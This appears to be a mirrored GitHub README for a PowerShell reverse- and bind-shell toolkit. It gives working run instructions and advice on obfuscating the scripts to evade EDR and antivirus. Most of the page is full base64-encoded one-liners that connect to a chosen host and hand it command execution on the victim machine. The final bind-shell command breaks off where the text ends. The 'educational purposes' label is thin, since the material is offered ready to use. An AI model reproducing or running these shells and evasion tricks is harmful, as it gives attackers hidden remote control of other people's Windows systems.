Giter VIP home page Giter VIP logo

simplepower-reverseshell's Introduction

PowerShell Reverse TCP

PowerShell scripts for communicating with a remote host.

Remote host will have a full control over the client and all the underlying system commands.

Check shells based on:

  • Invoke-Expression PowerShell command here,
  • process pipes here.

Tested with PowerShell v5.1.19041.1645 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

This repository started to have known signatures and I don't have time to upload new scripts each time so you should obfuscate these scripts yourself.

Future plans:

  • more shells based on process pipes, and optimize them further.

Table of Contents

How to Run

Change the IP address and port number inside the scripts as necessary.

Open the PowerShell from \src\invoke_expression\original\ or \src\process_pipes\original\ and run the commands shown below.

Set the execution policy:

Set-ExecutionPolicy Unrestricted

Run the script:

.\powershell_reverse_tcp.ps1

Or, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1

Obfuscate PowerShell Scripts

Try to bypass EDR and other security mechanisms by obfuscating your scripts. You can see such obfuscations in the examples below.

Original PowerShell command:

(New-Object Net.WebClient).DownloadFile($url, $out)

Obfuscated PowerShell command:

& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'

Check the original PowerShell script here and the fully obfuscated one here.

After manual obfuscation, the original PowerShell script was obfuscated with Invoke-Obfuscation. Credits to the author!

Search the Internet for additional obfuscation techniques and methods.

P.S. Because PowerShell is constantly being updated, some regular expressions (e.g. *ke-E*) may start to throw exceptions due to multiple methods matching the same expression, so the expressions will need to be specified a little bit better.

PowerShell Encoded Command

To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))

To decode a PowerShell encoded command, run the following PowerShell command:

[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))

Use the one-liners below if you don't want to leave any artifacts behind.

[Reverse TCP - Invoke-Expression] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -Command "'127.0.0.1', '9000'" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABhACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgACQAcAAgAD0AIAAkACgAUgBlAGEAZAAtAEgAbwBzAHQAIAAtAFAAcgBvAG0AcAB0ACAAIgBFAG4AdABlAHIAIABwAG8AcgB0ACAAbgB1AG0AYgBlAHIAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgAGkAZgAgACgAJABhAC4ATABlAG4AZwB0AGgAIAAtAGwAdAAgADEAIAAtAG8AcgAgACQAcAAuAEwAZQBuAGcAdABoACAALQBsAHQAIAAxACkAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBvAHQAaAAgAHAAYQByAGEAbQBlAHQAZQByAHMAIABhAHIAZQAgAHIAZQBxAHUAaQByAGUAZAAiADsAIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAUgBlAHYAZQByAHMAZQAgAFQAQwBQACAAdgAzAC4AOAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAGAAbgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAeQAgAEkAdgBhAG4AIABTAGkAbgBjAGUAawAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgAEcAaQB0AEgAdQBiACAAcgBlAHAAbwBzAGkAdABvAHIAeQAgAGEAdAAgAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBpAHYAYQBuAC0AcwBpAG4AYwBlAGsALwBwAG8AdwBlAHIAcwBoAGUAbABsAC0AcgBlAHYAZQByAHMAZQAtAHQAYwBwAC4AIAAjAGAAbgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwAgACQAYwAgAD0AIAAkAHMAIAA9ACAAJABiACAAPQAgACQAdwAgAD0AIAAkAGQAIAA9ACAAJAByACAAPQAgACQAbgB1AGwAbAA7ACAAdAByAHkAIAB7ACAAJABjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAoACQAYQAsACAAJABwACkAOwAgACQAcwAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAgACQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAIAAkAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwA7ACAAJAB3ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwAsACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALAAgADEAMAAyADQAKQA7ACAAJAB3AC4AQQB1AHQAbwBGAGwAdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBCAGEAYwBrAGQAbwBvAHIAIABpAHMAIAB1AHAAIABhAG4AZAAgAHIAdQBuAG4AaQBuAGcALgAuAC4AYABuACIAOwAgACQAYgB5ACAAPQAgADAAOwAgAGQAbwAgAHsAIAAkAHcALgBXAHIAaQB0AGUAKAAiAFAAUwA+ACIAKQA7ACAAZABvACAAewAgACQAYgB5ACAAPQAgACQAcwAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAOwAgAGkAZgAgACgAJABiAHkAIAAtAGcAdAAgADAAKQAgAHsAIAAkAGQAIAArAD0AIAAkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgAsACAAMAAsACAAJABiAHkAKQA7ACAAfQAgAH0AIAB3AGgAaQBsAGUAIAAoACQAcwAuAEQAYQB0AGEAQQB2AGEAaQBsAGEAYgBsAGUAKQA7ACAAaQBmACAAKAAkAGIAeQAgAC0AZwB0ACAAMAApACAAewAgACQAZAAgAD0AIAAkAGQALgBUAHIAaQBtACgAKQA7ACAAaQBmACAAKAAkAGQALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAApACAAewAgAHQAcgB5ACAAewAgACQAcgAgAD0AIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAkAGQAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAOwAgAH0AIABjAGEAdABjAGgAIAB7ACAAJAByACAAPQAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAOwAgAH0AIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGQAIgA7ACAAaQBmACAAKAAkAHIALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAApACAAewAgACQAdwAuAFcAcgBpAHQAZQAoACQAcgApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHIAIgA7ACAAfQAgAH0AIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABiAHkAIAAtAGcAdAAgADAAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBhAGMAawBkAG8AbwByACAAdwBpAGwAbAAgAG4AbwB3ACAAZQB4AGkAdAAuAC4ALgAiADsAIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwAgAH0AIABmAGkAbgBhAGwAbAB5ACAAewAgAGkAZgAgACgAJAB3ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAHcALgBDAGwAbwBzAGUAKAApADsAIAAkAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgB3ACIAOwAgAH0AIABpAGYAIAAoACQAcwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABzAC4AQwBsAG8AcwBlACgAKQA7ACAAJABzAC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAcwAiADsAIAB9ACAAaQBmACAAKAAkAGMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAYwAuAEMAbABvAHMAZQAoACkAOwAgACQAYwAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGMAIgA7ACAAfQAgAGkAZgAgACgAJABiACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGIALgBDAGwAZQBhAHIAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGIAIgA7ACAAfQAgAGkAZgAgACgAJAByACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHIAIgA7ACAAfQAgAGkAZgAgACgAJABkACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGQAIgA7ACAAfQAgAFsARwBDAF0AOgA6AEMAbwBsAGwAZQBjAHQAKAApADsAIAB9ACAAfQAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAYQAiADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHAAIgA7AA==

The encoded script will prompt for input. See the slightly altered script here - used the minified script to reduce the command length.

[Reverse TCP - Process Pipes] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -Command "'127.0.0.1', '9000'" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABhACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgACQAcAB0ACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAiACkALgBUAHIAaQBtACgAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7ACAAaQBmACAAKAAkAGEALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQAgAC0AbwByACAAJABwAHQALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQApACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAbwB0AGgAIABwAGEAcgBhAG0AZQB0AGUAcgBzACAAYQByAGUAIAByAGUAcQB1AGkAcgBlAGQAIgA7ACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAUABvAHcAZQByAFMAaABlAGwAbAAgAFIAZQB2AGUAcgBzAGUAIABUAEMAUAAgAHYAMwAuADgAIABiAHkAIABJAHYAYQBuACAAUwBpAG4AYwBlAGsALgBgAG4ARwBpAHQASAB1AGIAIAByAGUAcABvAHMAaQB0AG8AcgB5ACAAYQB0ACAAZwBpAHQAaAB1AGIALgBjAG8AbQAvAGkAdgBhAG4ALQBzAGkAbgBjAGUAawAvAHAAbwB3AGUAcgBzAGgAZQBsAGwALQByAGUAdgBlAHIAcwBlAC0AdABjAHAALgAiADsAIAAkAGMAIAA9ACAAJABzACAAPQAgACQAYgAgAD0AIAAkAHcAIAA9ACAAJABwACAAPQAgACQAZQAgAD0AIAAkAG8AIAA9ACAAJABlAGUAIAA9ACAAJABvAGUAIAA9ACAAJABuAHUAbABsADsAIAB0AHIAeQAgAHsAIAAkAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAYwBwAEMAbABpAGUAbgB0ACgAJABhACwAIAAkAHAAdAApADsAIAAkAHMAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAIAAkAHMALgBSAGUAYQBkAFQAaQBtAGUAbwB1AHQAIAA9ACAANQA7ACAAJABiACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABCAHkAdABlAFsAXQAgADEAMAAyADQAOwAgACQAdwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHMALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACwAIAAxADAAMgA0ACkAOwAgACQAdwAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7ACAAJABwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzADsAIAAkAHAALgBTAHQAYQByAHQASQBuAGYAbwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACAAJABwAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBGAGkAbABlAE4AYQBtAGUAIAA9ACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAgACQAcAAuAFMAdABhAHIAdABJAG4AZgBvAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3ACAAPQAgACQAdAByAHUAZQA7ACAAJABwAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQBdADoAOgBIAGkAZABkAGUAbgA7ACAAJABwAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAgAD0AIAAkAGYAYQBsAHMAZQA7ACAAJABwAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAEkAbgBwAHUAdAAgAD0AIAAkAHAALgBTAHQAYQByAHQASQBuAGYAbwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQARQByAHIAbwByACAAPQAgACQAcAAuAFMAdABhAHIAdABJAG4AZgBvAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAAgAD0AIAAkAHQAcgB1AGUAOwAgACQAcAAuAFMAdABhAHIAdABJAG4AZgBvAC4ARQByAHIAbwByAEQAaQBhAGwAbwBnACAAPQAgACQAZgBhAGwAcwBlADsAIAAkAHAALgBFAG4AYQBiAGwAZQBSAGEAaQBzAGkAbgBnAEUAdgBlAG4AdABzACAAPQAgACQAZgBhAGwAcwBlADsAIAAkAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByADsAIAAkAG8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByADsAIAAkAHMAYgAgAD0AIAB7ACAAaQBmACAAKAAkAEUAdgBlAG4AdABBAHIAZwBzAC4ARABhAHQAYQAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAJABFAHYAZQBuAHQALgBNAGUAcwBzAGEAZwBlAEQAYQB0AGEALgBBAHAAcABlAG4AZABMAGkAbgBlACgAJABFAHYAZQBuAHQAQQByAGcAcwAuAEQAYQB0AGEAKQA7ACAAfQAgAH0AOwAgACQAZQBlACAAPQAgAFIAZQBnAGkAcwB0AGUAcgAtAE8AYgBqAGUAYwB0AEUAdgBlAG4AdAAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABwACAALQBFAHYAZQBuAHQATgBhAG0AZQAgACIARQByAHIAbwByAEQAYQB0AGEAUgBlAGMAZQBpAHYAZQBkACIAIAAtAEEAYwB0AGkAbwBuACAAJABzAGIAIAAtAE0AZQBzAHMAYQBnAGUARABhAHQAYQAgACQAZQA7ACAAJABvAGUAIAA9ACAAUgBlAGcAaQBzAHQAZQByAC0ATwBiAGoAZQBjAHQARQB2AGUAbgB0ACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHAAIAAtAEUAdgBlAG4AdABOAGEAbQBlACAAIgBPAHUAdABwAHUAdABEAGEAdABhAFIAZQBjAGUAaQB2AGUAZAAiACAALQBBAGMAdABpAG8AbgAgACQAcwBiACAALQBNAGUAcwBzAGEAZwBlAEQAYQB0AGEAIAAkAG8AOwAgACQAcAAuAFMAdABhAHIAdAAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAIAAkAHAALgBCAGUAZwBpAG4ARQByAHIAbwByAFIAZQBhAGQATABpAG4AZQAoACkAOwAgACQAcAAuAEIAZQBnAGkAbgBPAHUAdABwAHUAdABSAGUAYQBkAEwAaQBuAGUAKAApADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBCAGEAYwBrAGQAbwBvAHIAIABpAHMAIAB1AHAAIABhAG4AZAAgAHIAdQBuAG4AaQBuAGcALgAuAC4AYABuACIAOwAgAHcAaABpAGwAZQAgACgAIQAkAHAALgBIAGEAcwBFAHgAaQB0AGUAZAApACAAewAgAHQAcgB5ACAAewAgACQAYgB5ACAAPQAgACQAcwAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAOwAgAGkAZgAgACgAJABiAHkAIAAtAGcAdAAgADAAKQAgAHsAIAAkAHAALgBTAHQAYQBuAGQAYQByAGQASQBuAHAAdQB0AC4AVwByAGkAdABlACgAJABiACwAIAAwACwAIAAkAGIAeQApADsAIAB9ACAAZQBsAHMAZQAgAHsAIABiAHIAZQBhAGsAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAE0AZQB0AGgAbwBkAEkAbgB2AG8AYwBhAHQAaQBvAG4ARQB4AGMAZQBwAHQAaQBvAG4AXQAgAHsAfQAgAGkAZgAgACgAJABlAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQAgAHsAIAAkAHcALgBXAHIAaQB0AGUAKAAkAG8ALgBUAG8AUwB0AHIAaQBuAGcAKAApACkAOwAgACQAbwAuAGMAbABlAGEAcgAoACkAOwAgAH0AIABpAGYAIAAoACQAbwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAJAB3AC4AVwByAGkAdABlACgAJABvAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAIAAkAG8ALgBjAGwAZQBhAHIAKAApADsAIAB9ACAAfQAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAHcAaQBsAGwAIABuAG8AdwAgAGUAeABpAHQALgAuAC4AIgA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsAIAB9ACAAZgBpAG4AYQBsAGwAeQAgAHsAIABpAGYAIAAoACQAZQBlACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABVAG4AcgBlAGcAaQBzAHQAZQByAC0ARQB2AGUAbgB0ACAALQBTAG8AdQByAGMAZQBJAGQAZQBuAHQAaQBmAGkAZQByACAAJABlAGUALgBOAGEAbQBlADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGUAZQAiADsAIAB9ACAAaQBmACAAKAAkAG8AZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAVQBuAHIAZQBnAGkAcwB0AGUAcgAtAEUAdgBlAG4AdAAgAC0AUwBvAHUAcgBjAGUASQBkAGUAbgB0AGkAZgBpAGUAcgAgACQAbwBlAC4ATgBhAG0AZQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBvAGUAIgA7ACAAfQAgAGkAZgAgACgAJABwACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAHAALgBDAGwAbwBzAGUAKAApADsAIAAkAHAALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBwACIAOwAgAH0AIABpAGYAIAAoACQAdwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJAB3AC4AQwBsAG8AcwBlACgAKQA7ACAAJAB3AC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAdwAiADsAIAB9ACAAaQBmACAAKAAkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAcwAuAEMAbABvAHMAZQAoACkAOwAgACQAcwAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHMAIgA7ACAAfQAgAGkAZgAgACgAJABjACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGMALgBDAGwAbwBzAGUAKAApADsAIAAkAGMALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBjACIAOwAgAH0AIABpAGYAIAAoACQAYgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABiAC4AQwBsAGUAYQByACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBiACIAOwAgAH0AIABpAGYAIAAoACQAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABlAC4AQwBsAGUAYQByACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBlACIAOwAgAH0AIABpAGYAIAAoACQAbwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABvAC4AQwBsAGUAYQByACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBvACIAOwAgAH0AIABbAEcAQwBdADoAOgBDAG8AbABsAGUAYwB0ACgAKQA7ACAAfQAgAH0AIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGEAIgA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBwAHQAIgA7AA==

The encoded script will prompt for input. See the slightly altered script here - used the minified script to reduce the command length.

[Bind TCP - Invoke-Expression] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -Command "'9000'" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABwACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAiACkALgBUAHIAaQBtACgAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7ACAAaQBmACAAKAAkAHAALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQApACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFAAbwByAHQAIABuAHUAbQBiAGUAcgAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiADsAIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABCAGkAbgBkACAAVABDAFAAIAB2ADMALgA4ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAGAAbgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHkAIABJAHYAYQBuACAAUwBpAG4AYwBlAGsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIABHAGkAdABIAHUAYgAgAHIAZQBwAG8AcwBp